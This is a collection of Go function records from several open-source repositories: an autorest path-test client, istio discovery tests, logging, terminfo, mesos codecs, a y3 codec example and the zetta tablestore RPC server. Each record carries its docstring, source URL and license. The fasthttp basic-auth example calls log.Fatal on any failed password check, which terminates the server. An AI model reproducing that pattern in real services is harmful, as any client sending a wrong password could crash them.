func (client *PathsClient) EnumValid(ctx context.Context, enumPath URIColor, options *PathsEnumValidOptions) (PathsEnumValidResponse, error) {
req, err := client.enumValidCreateRequest(ctx, enumPath, options)
if err != nil {
return PathsEnumValidResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsEnumValidResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsEnumValidResponse{}, client.enumValidHandleError(resp)
}
return PathsEnumValidResponse{RawResponse: resp}, nil
}
func (client *PathsClient) enumValidCreateRequest(ctx context.Context, enumPath URIColor, options *PathsEnumValidOptions) (*policy.Request, error) {
urlPath := "/paths/enum/green%20color/{enumPath}"
if enumPath == "" {
return nil, errors.New("parameter enumPath cannot be empty")
}
urlPath = strings.ReplaceAll(urlPath, "{enumPath}", url.PathEscape(string(enumPath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) enumValidHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) FloatScientificNegative(ctx context.Context, options *PathsFloatScientificNegativeOptions) (PathsFloatScientificNegativeResponse, error) {
req, err := client.floatScientificNegativeCreateRequest(ctx, options)
if err != nil {
return PathsFloatScientificNegativeResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsFloatScientificNegativeResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsFloatScientificNegativeResponse{}, client.floatScientificNegativeHandleError(resp)
}
return PathsFloatScientificNegativeResponse{RawResponse: resp}, nil
}
func (client *PathsClient) floatScientificNegativeCreateRequest(ctx context.Context, options *PathsFloatScientificNegativeOptions) (*policy.Request, error) {
urlPath := "/paths/float/-1.034E-20/{floatPath}"
urlPath = strings.ReplaceAll(urlPath, "{floatPath}", url.PathEscape("-1.034e-20"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) floatScientificNegativeHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) FloatScientificPositive(ctx context.Context, options *PathsFloatScientificPositiveOptions) (PathsFloatScientificPositiveResponse, error) {
req, err := client.floatScientificPositiveCreateRequest(ctx, options)
if err != nil {
return PathsFloatScientificPositiveResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsFloatScientificPositiveResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsFloatScientificPositiveResponse{}, client.floatScientificPositiveHandleError(resp)
}
return PathsFloatScientificPositiveResponse{RawResponse: resp}, nil
}
func (client *PathsClient) floatScientificPositiveCreateRequest(ctx context.Context, options *PathsFloatScientificPositiveOptions) (*policy.Request, error) {
urlPath := "/paths/float/1.034E+20/{floatPath}"
urlPath = strings.ReplaceAll(urlPath, "{floatPath}", url.PathEscape("103400000000000000000"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) floatScientificPositiveHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) GetBooleanFalse(ctx context.Context, options *PathsGetBooleanFalseOptions) (PathsGetBooleanFalseResponse, error) {
req, err := client.getBooleanFalseCreateRequest(ctx, options)
if err != nil {
return PathsGetBooleanFalseResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsGetBooleanFalseResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsGetBooleanFalseResponse{}, client.getBooleanFalseHandleError(resp)
}
return PathsGetBooleanFalseResponse{RawResponse: resp}, nil
}
func (client *PathsClient) getBooleanFalseCreateRequest(ctx context.Context, options *PathsGetBooleanFalseOptions) (*policy.Request, error) {
urlPath := "/paths/bool/false/{boolPath}"
urlPath = strings.ReplaceAll(urlPath, "{boolPath}", url.PathEscape("false"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) getBooleanFalseHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) GetBooleanTrue(ctx context.Context, options *PathsGetBooleanTrueOptions) (PathsGetBooleanTrueResponse, error) {
req, err := client.getBooleanTrueCreateRequest(ctx, options)
if err != nil {
return PathsGetBooleanTrueResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsGetBooleanTrueResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsGetBooleanTrueResponse{}, client.getBooleanTrueHandleError(resp)
}
return PathsGetBooleanTrueResponse{RawResponse: resp}, nil
}
func (client *PathsClient) getBooleanTrueCreateRequest(ctx context.Context, options *PathsGetBooleanTrueOptions) (*policy.Request, error) {
urlPath := "/paths/bool/true/{boolPath}"
urlPath = strings.ReplaceAll(urlPath, "{boolPath}", url.PathEscape("true"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) getBooleanTrueHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) GetIntNegativeOneMillion(ctx context.Context, options *PathsGetIntNegativeOneMillionOptions) (PathsGetIntNegativeOneMillionResponse, error) {
req, err := client.getIntNegativeOneMillionCreateRequest(ctx, options)
if err != nil {
return PathsGetIntNegativeOneMillionResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsGetIntNegativeOneMillionResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsGetIntNegativeOneMillionResponse{}, client.getIntNegativeOneMillionHandleError(resp)
}
return PathsGetIntNegativeOneMillionResponse{RawResponse: resp}, nil
}
func (client *PathsClient) getIntNegativeOneMillionCreateRequest(ctx context.Context, options *PathsGetIntNegativeOneMillionOptions) (*policy.Request, error) {
urlPath := "/paths/int/-1000000/{intPath}"
urlPath = strings.ReplaceAll(urlPath, "{intPath}", url.PathEscape("-1000000"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) getIntNegativeOneMillionHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) GetIntOneMillion(ctx context.Context, options *PathsGetIntOneMillionOptions) (PathsGetIntOneMillionResponse, error) {
req, err := client.getIntOneMillionCreateRequest(ctx, options)
if err != nil {
return PathsGetIntOneMillionResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsGetIntOneMillionResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsGetIntOneMillionResponse{}, client.getIntOneMillionHandleError(resp)
}
return PathsGetIntOneMillionResponse{RawResponse: resp}, nil
} | MIT License |
istio/old_pilot_repo | proxy/envoy/discovery_test.go | TestServiceDiscoveryListAllServices | go | func TestServiceDiscoveryListAllServices(t *testing.T) {
_, _, ds := commonSetup(t)
url := "/v1/registration/"
response := makeDiscoveryRequest(ds, "GET", url, t)
compareResponse(response, "testdata/all-sds.json", t)
} | Can we list Services? | https://github.com/istio/old_pilot_repo/blob/328700a0b55e097df7490e1fa7a0afdc24d80828/proxy/envoy/discovery_test.go#L127-L132 | package envoy
import (
"errors"
"fmt"
"io/ioutil"
"net/http"
"net/http/httptest"
"testing"
restful "github.com/emicklei/go-restful"
proxyconfig "istio.io/api/proxy/v1/config"
"istio.io/pilot/adapter/config/memory"
"istio.io/pilot/model"
"istio.io/pilot/proxy"
"istio.io/pilot/test/mock"
"istio.io/pilot/test/util"
)
type mockController struct {
handlers int
}
func (ctl *mockController) AppendServiceHandler(_ func(*model.Service, model.Event)) error {
ctl.handlers++
return nil
}
func (ctl *mockController) AppendInstanceHandler(_ func(*model.ServiceInstance, model.Event)) error {
ctl.handlers++
return nil
}
func (ctl *mockController) Run(_ <-chan struct{}) {}
var mockDiscovery *mock.ServiceDiscovery
func makeDiscoveryService(t *testing.T, r model.ConfigStore, mesh *proxyconfig.MeshConfig) *DiscoveryService {
mockDiscovery = mock.Discovery
mockDiscovery.ClearErrors()
out, err := NewDiscoveryService(
&mockController{},
nil,
proxy.Environment{
ServiceDiscovery: mockDiscovery,
ServiceAccounts: mockDiscovery,
IstioConfigStore: model.MakeIstioStore(r),
Mesh: mesh,
},
DiscoveryServiceOptions{
EnableCaching: true,
EnableProfiling: true,
})
if err != nil {
t.Fatalf("NewDiscoveryService failed: %v", err)
}
return out
}
func makeDiscoveryRequest(ds *DiscoveryService, method, url string, t *testing.T) []byte {
httpRequest, err := http.NewRequest(method, url, nil)
if err != nil {
t.Fatal(err)
}
httpWriter := httptest.NewRecorder()
container := restful.NewContainer()
ds.Register(container)
container.ServeHTTP(httpWriter, httpRequest)
body, err := ioutil.ReadAll(httpWriter.Result().Body)
if err != nil {
t.Fatal(err)
}
return body
}
func getDiscoveryResponse(ds *DiscoveryService, method, url string, t *testing.T) *http.Response {
httpRequest, err := http.NewRequest(method, url, nil)
if err != nil {
t.Fatal(err)
}
httpWriter := httptest.NewRecorder()
container := restful.NewContainer()
ds.Register(container)
container.ServeHTTP(httpWriter, httpRequest)
return httpWriter.Result()
}
func commonSetup(t *testing.T) (*proxyconfig.MeshConfig, model.ConfigStore, *DiscoveryService) {
mesh := makeMeshConfig()
registry := memory.Make(model.IstioConfigTypes)
ds := makeDiscoveryService(t, registry, &mesh)
return &mesh, registry, ds
}
func compareResponse(body []byte, file string, t *testing.T) {
err := ioutil.WriteFile(file, body, 0644)
if err != nil {
t.Fatalf(err.Error())
}
util.CompareYAML(file, t)
}
func TestServiceDiscovery(t *testing.T) {
_, _, ds := commonSetup(t)
url := "/v1/registration/" + mock.HelloService.Key(mock.HelloService.Ports[0], nil)
response := makeDiscoveryRequest(ds, "GET", url, t)
compareResponse(response, "testdata/sds.json", t)
} | Apache License 2.0 |
go-playground/log | log.go | WithDefaultFields | go | func WithDefaultFields(fields ...Field) {
logFields = append(logFields, fields...)
} | WithDefaultFields adds fields to the underlying logger instance | https://github.com/go-playground/log/blob/c55d790af58151ce9d42f83eb917a84f59b4d08a/log.go#L175-L177 | package log
import (
"context"
"os"
"sync"
"time"
"golang.org/x/crypto/ssh/terminal"
)
var (
bytePool = &ByteArrayPool{pool: &sync.Pool{
New: func() interface{} {
return make([]byte, 0, 32)
},
}}
defaultHandlerRegistered = false
defaultHandler *console
)
func init() {
if terminal.IsTerminal(int(os.Stdout.Fd())) {
defaultHandler = newDefaultLogger()
AddHandler(defaultHandler, AllLevels...)
defaultHandlerRegistered = true
}
}
const (
DefaultTimeFormat = "2006-01-02T15:04:05.000000000Z07:00"
)
var (
logFields []Field
logHandlers = map[Level][]Handler{}
exitFunc = os.Exit
withErrFn = errorsWithError
ctxIdent = &struct {
name string
}{
name: "log",
}
rw sync.RWMutex
)
type Field struct {
Key string `json:"key"`
Value interface{} `json:"value"`
}
func SetExitFunc(fn func(code int)) {
exitFunc = fn
}
func SetWithErrorFn(fn func(Entry, error) Entry) {
withErrFn = fn
}
func SetContext(ctx context.Context, e Entry) context.Context {
return context.WithValue(ctx, ctxIdent, e)
}
func GetContext(ctx context.Context) Entry {
v := ctx.Value(ctxIdent)
if v == nil {
return newEntryWithFields(nil)
}
return v.(Entry)
}
func BytePool() *ByteArrayPool {
return bytePool
}
func HandleEntry(e Entry) {
if !e.start.IsZero() {
e = e.WithField("duration", time.Since(e.start))
}
e.Timestamp = time.Now()
rw.RLock()
for _, h := range logHandlers[e.Level] {
h.Log(e)
}
rw.RUnlock()
}
func F(key string, value interface{}) Field {
return Field{Key: key, Value: value}
}
func AddHandler(h Handler, levels ...Level) {
rw.Lock()
defer rw.Unlock()
if defaultHandlerRegistered {
removeHandler(defaultHandler)
defaultHandler.Close()
defaultHandler = nil
defaultHandlerRegistered = false
}
for _, level := range levels {
handler := append(logHandlers[level], h)
logHandlers[level] = handler
}
}
func RemoveHandler(h Handler) {
rw.Lock()
removeHandler(h)
rw.Unlock()
}
func removeHandler(h Handler) {
OUTER:
for lvl, handlers := range logHandlers {
for i, handler := range handlers {
if h == handler {
n := append(handlers[:i], handlers[i+1:]...)
if len(n) == 0 {
delete(logHandlers, lvl)
continue OUTER
}
logHandlers[lvl] = n
continue OUTER
}
}
}
}
func RemoveHandlerLevels(h Handler, levels ...Level) {
rw.Lock()
defer rw.Unlock()
OUTER:
for _, lvl := range levels {
handlers := logHandlers[lvl]
for i, handler := range handlers {
if h == handler {
n := append(handlers[:i], handlers[i+1:]...)
if len(n) == 0 {
delete(logHandlers, lvl)
continue OUTER
}
logHandlers[lvl] = n
continue OUTER
}
}
}
} | MIT License |
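A hedged usage sketch for WithDefaultFields. It relies on the package's default console handler (registered above when stdout is a terminal) and on package-level Info/WithFields helpers, which are assumed from the library's public API rather than shown in this record.

package main

import (
	"github.com/go-playground/log"
)

func main() {
	// Fields added here are appended to every subsequent log entry.
	log.WithDefaultFields(
		log.F("app", "orders-api"),
		log.F("env", "staging"),
	)

	// Assumed package-level helpers; the default console handler prints these
	// because AddHandler was never called to replace it.
	log.Info("service started")
	log.WithFields(log.F("order_id", 42)).Info("order accepted")
}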
root4loot/rescope | vendor/github.com/xo/terminfo/color.go | ChromaFormatterName | go | func (c ColorLevel) ChromaFormatterName() string {
switch c {
case ColorLevelBasic:
return "terminal"
case ColorLevelHundreds:
return "terminal256"
case ColorLevelMillions:
return "terminal16m"
}
return "noop"
} | ChromaFormatterName returns the github.com/alecthomas/chroma compatible
formatter name for the color level. | https://github.com/root4loot/rescope/blob/3423ba047ed5ac5d89822dbd88dc6e90f076e964/vendor/github.com/xo/terminfo/color.go#L35-L45 | package terminfo
import (
"os"
"strconv"
"strings"
)
type ColorLevel uint
const (
ColorLevelNone ColorLevel = iota
ColorLevelBasic
ColorLevelHundreds
ColorLevelMillions
)
func (c ColorLevel) String() string {
switch c {
case ColorLevelBasic:
return "basic"
case ColorLevelHundreds:
return "hundreds"
case ColorLevelMillions:
return "millions"
}
return "none"
} | MIT License |
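A hedged sketch pairing ChromaFormatterName with the chroma quick helper. ColorLevelFromEnv and the chroma API are assumptions drawn from those libraries' documented interfaces, not from the code shown in this record.

package main

import (
	"log"
	"os"

	"github.com/alecthomas/chroma/quick"
	"github.com/xo/terminfo"
)

func main() {
	// Assumed helper from xo/terminfo that inspects TERM/COLORTERM.
	level, err := terminfo.ColorLevelFromEnv()
	if err != nil {
		level = terminfo.ColorLevelNone
	}

	src := `package main

func main() { println("hi") }
`
	// ChromaFormatterName maps the detected level to "noop", "terminal",
	// "terminal256" or "terminal16m".
	if err := quick.Highlight(os.Stdout, src, "go", level.ChromaFormatterName(), "monokai"); err != nil {
		log.Fatal(err)
	}
}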
fasthttp/router | _examples/auth/auth.go | BasicAuth | go | func BasicAuth(h fasthttp.RequestHandler, requiredUser string, requiredPasswordHash []byte) fasthttp.RequestHandler {
return func(ctx *fasthttp.RequestCtx) {
user, password, hasAuth := basicAuth(ctx)
if hasAuth && user == requiredUser {
err := scrypt.CompareHashAndPassword(requiredPasswordHash, []byte(password))
if err != nil {
log.Fatal(err)
} else {
h(ctx)
return
}
}
ctx.Error(fasthttp.StatusMessage(fasthttp.StatusUnauthorized), fasthttp.StatusUnauthorized)
ctx.Response.Header.Set("WWW-Authenticate", "Basic realm=Restricted")
}
} | BasicAuth is the basic auth handler | https://github.com/fasthttp/router/blob/e8b4c1b7a7f4e5faeaf0be3dd5c589744dca0553/_examples/auth/auth.go#L45-L81 | package main
import (
"encoding/base64"
"fmt"
"log"
"strings"
scrypt "github.com/elithrar/simple-scrypt"
"github.com/fasthttp/router"
"github.com/valyala/fasthttp"
)
func basicAuth(ctx *fasthttp.RequestCtx) (username, password string, ok bool) {
auth := ctx.Request.Header.Peek("Authorization")
if auth == nil {
return
}
return parseBasicAuth(string(auth))
}
func parseBasicAuth(auth string) (username, password string, ok bool) {
const prefix = "Basic "
if !strings.HasPrefix(auth, prefix) {
return
}
c, err := base64.StdEncoding.DecodeString(auth[len(prefix):])
if err != nil {
return
}
cs := string(c)
s := strings.IndexByte(cs, ':')
if s < 0 {
return
}
return cs[:s], cs[s+1:], true
} | BSD 3-Clause New or Revised License |
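A hedged sketch showing how the BasicAuth wrapper above could be registered on a router. It assumes BasicAuth from this record is available in the same package; the credentials, route, and startup-time hash generation are illustrative (a real deployment would store a precomputed hash).

package main

import (
	"log"

	scrypt "github.com/elithrar/simple-scrypt"
	"github.com/fasthttp/router"
	"github.com/valyala/fasthttp"
)

func secret(ctx *fasthttp.RequestCtx) {
	ctx.WriteString("only for authenticated users\n")
}

func main() {
	// Illustrative only: hash a literal password at startup.
	hash, err := scrypt.GenerateFromPassword([]byte("s3cret"), scrypt.DefaultParams)
	if err != nil {
		log.Fatal(err)
	}

	r := router.New()
	r.GET("/protected", BasicAuth(secret, "admin", hash))

	log.Fatal(fasthttp.ListenAndServe(":8080", r.Handler))
}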
mesos/mesos-go | api/v1/lib/encoding/types.go | String | go | func (c *Codec) String() string {
if c == nil {
return ""
}
return c.Name
} | String implements the fmt.Stringer interface. | https://github.com/mesos/mesos-go/blob/de775c0c58642395394de8e54c6677063cfe3b1f/api/v1/lib/encoding/types.go#L67-L72 | package encoding
import (
"encoding/json"
"io"
pb "github.com/gogo/protobuf/proto"
"github.com/mesos/mesos-go/api/v1/lib/encoding/framing"
)
type MediaType string
func (m MediaType) ContentType() string { return string(m) }
type (
Source func() framing.Reader
Sink func() framing.Writer
Codec struct {
Name string
Type MediaType
NewEncoder func(Sink) Encoder
NewDecoder func(Source) Decoder
}
SourceFactory interface {
NewSource(r io.Reader) Source
}
SourceFactoryFunc func(r io.Reader) Source
SinkFactory interface {
NewSink(w io.Writer) Sink
}
SinkFactoryFunc func(w io.Writer) Sink
)
func (f SourceFactoryFunc) NewSource(r io.Reader) Source { return f(r) }
func (f SinkFactoryFunc) NewSink(w io.Writer) Sink { return f(w) }
var (
_ = SourceFactory(SourceFactoryFunc(nil))
_ = SinkFactory(SinkFactoryFunc(nil))
)
func SourceReader(r io.Reader) Source {
ch := make(chan framing.ReaderFunc, 1)
ch <- framing.ReadAll(r)
return func() framing.Reader {
select {
case f := <-ch:
return f
default:
return framing.ReaderFunc(framing.EOFReaderFunc)
}
}
}
func SinkWriter(w io.Writer) Sink { return func() framing.Writer { return framing.WriterFor(w) } } | Apache License 2.0 |
yomorun/y3-codec-golang | examples/primitive/bool/main.go | main | go | func main() {
var data bool = true
var prim = y3.NewPrimitivePacketEncoder(0x01)
prim.SetBoolValue(data)
buf := prim.Encode()
res, _, _, _ := y3.DecodePrimitivePacket(buf)
val, _ := res.ToBool()
fmt.Printf("val=%v", val)
} | Example of encoding and decoding bool type by using PrimitivePacket. | https://github.com/yomorun/y3-codec-golang/blob/a98ecabde90aed69252771e91ff879e175877978/examples/primitive/bool/main.go#L10-L20 | package main
import (
"fmt"
"github.com/yomorun/y3-codec-golang"
) | Apache License 2.0 |
packtworkshops/the-go-workshop | Chapter14/Activity14.02/solution/main_test.go | TestGetDataAndParseResponse | go | func TestGetDataAndParseResponse(t *testing.T) {
err := addNameAndParseResponse("Electric")
if err != nil {
t.Fatal(err)
}
err = addNameAndParseResponse("Boogaloo")
if err != nil {
t.Fatal(err)
}
names := getDataAndParseResponse()
if len(names) != 2 {
t.Error("values don't match")
}
} | TestGetDataAndParseResponse requires the server to be running to succeed | https://github.com/packtworkshops/the-go-workshop/blob/ee0def0b7432bf69985b318ccce231864a6205de/Chapter14/Activity14.02/solution/main_test.go#L8-L21 | package main
import (
"testing"
) | MIT License |
zhihu/zetta | tablestore/server/rpc_server.go | Commit | go | func (rs *RPCServer) Commit(ctx context.Context, req *tspb.CommitRequest) (*tspb.CommitResponse, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
commitCounterGerneralErr.Inc()
return nil, err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
txnSel := &tspb.TransactionSelector{}
switch req.Transaction.(type) {
case *tspb.CommitRequest_SingleUseTransaction:
txnSel.Selector = &tspb.TransactionSelector_SingleUse{
SingleUse: req.GetSingleUseTransaction(),
}
case *tspb.CommitRequest_TransactionId:
txnSel.Selector = &tspb.TransactionSelector_Id{
Id: req.GetTransactionId(),
}
default:
return nil, status.Errorf(codes.Aborted, "unsupported transaction type %T", req.Transaction)
}
if len(req.Table) == 0 {
return nil, status.Error(codes.InvalidArgument, "missing field <table>")
}
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: true,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, txnSel, &rtOpt)
if err != nil {
commitCounterGerneralErr.Inc()
return nil, status.Errorf(codes.Aborted, "retrieve session transaction failed %v", err)
}
startTS := time.Now()
r, err := sess.HandleMutate(ctx, req, txn)
durMutate := time.Since(startTS)
if err != nil {
executeMutateDurationGeneralErr.Observe(durMutate.Seconds())
commitCounterGerneralErr.Inc()
return nil, err
}
executeMutateDurationGeneralOK.Observe(durMutate.Seconds())
commitCounterGerneralOK.Inc()
return rpc.BuildCommitResponse(r), nil
} | Commit commits a transaction. The request includes the mutations to be
applied to rows in the database.
`Commit` might return an `ABORTED` error. This can occur at any time;
commonly, the cause is conflicts with concurrent
transactions. However, it can also happen for a variety of other
reasons. If `Commit` returns `ABORTED`, the caller should re-attempt
the transaction from the beginning, re-using the same session. | https://github.com/zhihu/zetta/blob/3903214c1bb05272931aaf958ae1aa00d6529b5a/tablestore/server/rpc_server.go#L633-L682 | package server
import (
"context"
"fmt"
"io"
"sync"
"sync/atomic"
"time"
"go.uber.org/zap"
"google.golang.org/grpc"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
emptypb "github.com/gogo/protobuf/types"
grpc_middleware "github.com/grpc-ecosystem/go-grpc-middleware"
grpc_opentracing "github.com/grpc-ecosystem/go-grpc-middleware/tracing/opentracing"
grpc_prometheus "github.com/grpc-ecosystem/go-grpc-prometheus"
"github.com/pingcap/tidb/util/logutil"
tspb "github.com/zhihu/zetta-proto/pkg/tablestore"
"github.com/zhihu/zetta/pkg/metrics"
"github.com/zhihu/zetta/tablestore/domain"
"github.com/zhihu/zetta/tablestore/rpc"
"github.com/zhihu/zetta/tablestore/session"
"github.com/zhihu/zetta/tablestore/sessionctx"
)
var (
grpcMetrics = grpc_prometheus.NewServerMetrics()
createSessionGerneralOK = metrics.CreateSessionCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
deleteSessionGerneralOK = metrics.DeleteSessionCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
readCounterGerneralOK = metrics.ReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
readCounterGerneralErr = metrics.ReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
streamReadCounterGerneralOK = metrics.StreamReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
streamReadCounterGerneralErr = metrics.StreamReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
sparseReadCounterGerneralOK = metrics.SparseReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
sparseReadCounterGerneralErr = metrics.SparseReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
commitCounterGerneralOK = metrics.CommitCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
commitCounterGerneralErr = metrics.CommitCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
mutateCounterGerneralOK = metrics.MutateCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
mutateCounterGerneralErr = metrics.MutateCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
executeMutateDurationGeneralOK = metrics.ExecuteMutateDuration.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
executeMutateDurationGeneralErr = metrics.ExecuteMutateDuration.WithLabelValues(metrics.LblGeneral, metrics.LblError)
executeReadDurationGeneralOK = metrics.ExecuteReadDuration.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
executeReadDurationGeneralErr = metrics.ExecuteReadDuration.WithLabelValues(metrics.LblGeneral, metrics.LblError)
)
type RPCServer struct {
s *Server
rpc *grpc.Server
mu sync.Mutex
tspb.TablestoreAdminServer
tspb.TablestoreServer
}
func NewRPCServer(s *Server) *RPCServer {
rs := &RPCServer{s: s}
unaryInterceptor := grpc_middleware.ChainUnaryServer(
grpc_prometheus.UnaryServerInterceptor,
grpc_opentracing.UnaryServerInterceptor(),
)
streamInterceptor := grpc_middleware.ChainStreamServer(
grpc_prometheus.StreamServerInterceptor,
grpc_opentracing.StreamServerInterceptor(),
)
rs.rpc = grpc.NewServer(
grpc.StreamInterceptor(streamInterceptor),
grpc.UnaryInterceptor(unaryInterceptor),
)
tspb.RegisterTablestoreAdminServer(rs.rpc, rs)
tspb.RegisterTablestoreServer(rs.rpc, rs)
return rs
}
func (rs *RPCServer) Run() {
go rs.rpc.Serve(rs.s.listener)
}
func (rs *RPCServer) Close() {
rs.mu.Lock()
defer rs.mu.Unlock()
rs.rpc.GracefulStop()
}
func (rs *RPCServer) CreateSession(ctx context.Context, req *tspb.CreateSessionRequest) (*tspb.Session, error) {
if req.Database == "" {
return nil, status.Errorf(codes.InvalidArgument, "database null")
}
is := domain.GetOnlyDomain().InfoSchema()
if _, ok := is.GetDatabaseMetaByName(req.Database); !ok {
return nil, status.Errorf(codes.NotFound, "no such database %s", req.Database)
}
queryID := atomic.AddUint32(&baseQueryID, 1)
rs.s.rwlock.Lock()
defer rs.s.rwlock.Unlock()
if len(rs.s.queryCtxs)+1 > rs.s.cfg.MaxSessions {
return nil, status.Errorf(codes.ResourceExhausted, "session count exceeds max-sessions %v", rs.s.cfg.MaxSessions)
}
qctx, err := rs.s.driver.OpenCtx(uint64(queryID), req.Database)
if err != nil {
return nil, status.Errorf(codes.Internal, "open query ctx error %v", err)
}
if req.Session != nil {
qctx.GetSession().SetLabels(req.Session.Labels)
}
rs.s.queryCtxs[qctx.GetSession().GetName()] = qctx
createSessionGerneralOK.Add(1)
return qctx.GetSession().ToProto(), nil
}
func (rs *RPCServer) BatchCreateSessions(ctx context.Context, req *tspb.BatchCreateSessionsRequest) (*tspb.BatchCreateSessionsResponse, error) {
if req.Database == "" {
return nil, status.Errorf(codes.InvalidArgument, "database null")
}
is := domain.GetOnlyDomain().InfoSchema()
if _, ok := is.GetDatabaseMetaByName(req.Database); !ok {
return nil, status.Errorf(codes.NotFound, "no such database %s", req.Database)
}
if req.SessionTemplate == nil {
return nil, status.Errorf(codes.InvalidArgument, "session template is required")
}
var sessions []*tspb.Session
rs.s.rwlock.Lock()
defer rs.s.rwlock.Unlock()
if len(rs.s.queryCtxs)+int(req.GetSessionCount()) > rs.s.cfg.MaxSessions {
return nil, status.Errorf(codes.ResourceExhausted, "session count exceeds max-sessions %v", rs.s.cfg.MaxSessions)
}
for i := int32(0); i < req.GetSessionCount(); i++ {
queryID := atomic.AddUint32(&baseQueryID, 1)
qctx, err := rs.s.driver.OpenCtx(uint64(queryID), req.Database)
if err != nil {
return nil, status.Errorf(codes.Aborted, "create session error %v", err)
}
qctx.GetSession().SetLabels(req.SessionTemplate.Labels)
rs.s.queryCtxs[qctx.GetSession().GetName()] = qctx
sessions = append(sessions, qctx.GetSession().ToProto())
createSessionGerneralOK.Add(1)
}
return &tspb.BatchCreateSessionsResponse{Session: sessions}, nil
}
func (rs *RPCServer) GetSession(ctx context.Context, req *tspb.GetSessionRequest) (*tspb.Session, error) {
